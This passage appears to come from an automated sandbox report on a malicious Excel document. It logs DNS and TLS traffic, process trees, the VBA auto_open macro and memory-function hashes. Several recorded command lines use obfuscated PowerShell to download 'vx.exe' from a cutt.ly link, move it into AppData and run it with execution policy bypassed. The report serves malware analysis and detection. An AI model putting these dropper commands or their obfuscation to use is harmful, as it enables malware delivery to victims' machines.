                                                Nov 19, 2020 09:56:41.356940985 CET8.8.8.8192.168.2.220xc6ccNo error (0)cutt.ly104.22.1.232A (IP address)IN (0x0001)
                                                Nov 19, 2020 09:56:43.100631952 CET8.8.8.8192.168.2.220x1bacNo error (0)shopphongtinh.com202.92.6.10A (IP address)IN (0x0001)

                                                HTTPS Packets

                                                TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                Nov 19, 2020 09:56:41.431972027 CET104.22.0.232443192.168.2.2249165CN=www.cutt.ly CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USSat Feb 08 01:00:00 CET 2020 Thu Nov 02 13:24:33 CET 2017Thu Apr 08 14:00:00 CEST 2021 Tue Nov 02 13:24:33 CET 2027769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USThu Nov 02 13:24:33 CET 2017Tue Nov 02 13:24:33 CET 2027

                                                Code Manipulations

                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                Analysis Process: EXCEL.EXE PID: 1916 Parent PID: 584

                                                General

                                                Start time:09:56:43
                                                Start date:19/11/2020
                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                Wow64 process (32bit):false
                                                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                Imagebase:0x13f6e0000
                                                File size:27641504 bytes
                                                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: cmd.exe PID: 1748 Parent PID: 1916

                                                General

                                                Start time:09:56:46
                                                Start date:19/11/2020
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
                                                Imagebase:0x4aa10000
                                                File size:345088 bytes
                                                MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate

                                                Chronological Activities

                                                Analysis Process: cmd.exe PID: 1960 Parent PID: 1916

                                                General

                                                Start time:09:56:46
                                                Start date:19/11/2020
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
                                                Imagebase:0x4aa10000
                                                File size:345088 bytes
                                                MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate

                                                Chronological Activities

                                                Analysis Process: cmd.exe PID: 1520 Parent PID: 1916

                                                General

                                                Start time:09:56:47
                                                Start date:19/11/2020
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
                                                Imagebase:0x4aa10000
                                                File size:345088 bytes
                                                MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate

                                                Chronological Activities

                                                Analysis Process: powershell.exe PID: 2304 Parent PID: 1748

                                                General

                                                Start time:09:56:47
                                                Start date:19/11/2020
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
                                                Imagebase:0x13f0f0000
                                                File size:473600 bytes
                                                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: powershell.exe PID: 2744 Parent PID: 1960

                                                General

                                                Start time:09:56:47
                                                Start date:19/11/2020
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
                                                Imagebase:0x13f0f0000
                                                File size:473600 bytes
                                                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: powershell.exe PID: 2720 Parent PID: 1520

                                                General

                                                Start time:09:56:48
                                                Start date:19/11/2020
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
                                                Imagebase:0x13f0f0000
                                                File size:473600 bytes
                                                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Reputation:high

                                                Chronological Activities

                                                Disassembly

                                                Code Analysis

                                                VBA Code

                                                Call Graph

                                                Graph

                                                • Entrypoint
                                                • Decryption Function
                                                • Executed
                                                • Not Executed
                                                • Show Help
                                                callgraph 11 auto_open Run:1,Range:1

                                                Module: Feuil1

                                                Declaration
                                                LineContent
                                                1

                                                Attribute VB_Name = "Feuil1"

                                                2

                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                3

                                                Attribute VB_GlobalNameSpace = False

                                                4

                                                Attribute VB_Creatable = False

                                                5

                                                Attribute VB_PredeclaredId = True

                                                6

                                                Attribute VB_Exposed = True

                                                7

                                                Attribute VB_TemplateDerived = False

                                                8

                                                Attribute VB_Customizable = True

                                                Module: Module1

                                                Declaration
                                                LineContent
                                                1

                                                Attribute VB_Name = "Module1"

                                                Executed Functions
                                                Subroutine auto_open, APIs: 2, Strings: 3, Number of lines: 6, Relevance: 14.006
                                                APIsMeta Information

                                                Range

                                                Run

                                                		Run("Auto_ouvrir51")
                                                StringsDecrypted Strings
                                                "Auto_ouvrir51"
                                                "E580"
                                                "Auto_ouvrir51"
                                                LineInstructionMeta Information
                                                2

                                                Sub auto_open()

                                                5

                                                Dim strMacro as String

                                                executed
                                                10

                                                Sheets(1).Range("E580").Name = "Auto_ouvrir51"

                                                Range

                                                13

                                                strMacro = "Auto_ouvrir51"

                                                14

                                                Run (strMacro)

                                                Run("Auto_ouvrir51")

                                                executed
                                                18

                                                End Sub

                                                Module: ThisWorkbook

                                                Declaration
                                                LineContent
                                                1

                                                Attribute VB_Name = "ThisWorkbook"

                                                2

                                                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                3

                                                Attribute VB_GlobalNameSpace = False

                                                4

                                                Attribute VB_Creatable = False

                                                5

                                                Attribute VB_PredeclaredId = True

                                                6

                                                Attribute VB_Exposed = True

                                                7

                                                Attribute VB_TemplateDerived = False

                                                8

                                                Attribute VB_Customizable = True

                                                Reset < >

                                                  Analysis Process: powershell.exe PID: 2304 Parent PID: 1748 powershell.exeCOMMON

                                                  Executed Functions

                                                  Function 000007FF0027083B, Relevance: .2, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2125837651.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6b6f00791207c5493c5a327c8f9643fe8de3a6d27fbf4b0e64130316b3efad45
                                                  • Instruction ID: 32942690430fe3bb9dd140979e809abc80a92f72e3b506fb9baf7671c0cb1610
                                                  • Opcode Fuzzy Hash: 6b6f00791207c5493c5a327c8f9643fe8de3a6d27fbf4b0e64130316b3efad45
                                                  • Instruction Fuzzy Hash: 5A417E1060EBC64FE7539738586A6B57FF09F57210B1A00E7D488CB1A3D9589D49C7A3
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 000007FF00271343, Relevance: .0, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2125837651.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e71e12b27161e7403694d4a4d4f42d07d8a95aff4904a63b323e407ccb2c87b9
                                                  • Instruction ID: 7dabbabf765e9989507a12f0764f6d849c42be9cb0aee42d5836f5a977ea7740
                                                  • Opcode Fuzzy Hash: e71e12b27161e7403694d4a4d4f42d07d8a95aff4904a63b323e407ccb2c87b9
                                                  • Instruction Fuzzy Hash: A7F0E22140E3C58FD3039B789C654847FB0AE47254B4A06DBD884CF0B3E21C1AA8C763
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Analysis Process: powershell.exe PID: 2744 Parent PID: 1960 powershell.exeCOMMON

                                                  Executed Functions

                                                  Function 000007FF00271361, Relevance: .2, Instructions: 172COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2161463199.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 08fce486515753f9a267849b020b335a73f3593e5255a95f48c36deab500af23
                                                  • Instruction ID: 046aab66ffa8a8603c6489c32547ef780c47b32581acda7d918a50efb57e1ba1
                                                  • Opcode Fuzzy Hash: 08fce486515753f9a267849b020b335a73f3593e5255a95f48c36deab500af23
                                                  • Instruction Fuzzy Hash: 79413361A0EBD60FD7039B386C656A17FB0AF97214B0A02E7D488CF0E3D51D4E5AC362
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 000007FF0027103C, Relevance: .1, Instructions: 80COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2161463199.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e9590d7178305f3a6995589f2c417e04bc632b60e4fd06033736d876b68269eb
                                                  • Instruction ID: 4f3e75f022261eb8d6a55b5c34527809d9690a7742d3980f6e370fef96b66cd6
                                                  • Opcode Fuzzy Hash: e9590d7178305f3a6995589f2c417e04bc632b60e4fd06033736d876b68269eb
                                                  • Instruction Fuzzy Hash: 5301446195E7D54FD30357745C6AAA13FB15F17210F1A02DBD584CF0A3D28D4A89D3A2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Analysis Process: powershell.exe PID: 2720 Parent PID: 1520 powershell.exeCOMMON

                                                  Executed Functions

                                                  Function 000007FF00271181, Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2168676349.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 92244aba76804312bfac89e6d88ccc613308891ef8c1cb1f05d99d9cffe4019c
                                                  • Instruction ID: 981d23bf3291bb38d7f5aee097dd7a9782e796792e6c4a32ee5f0c67a50f8252
                                                  • Opcode Fuzzy Hash: 92244aba76804312bfac89e6d88ccc613308891ef8c1cb1f05d99d9cffe4019c
                                                  • Instruction Fuzzy Hash: E001D0A184E7C14FD30387785C296917FB0AF93248F0E02DBD4C4CE0B3E549095AC362
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions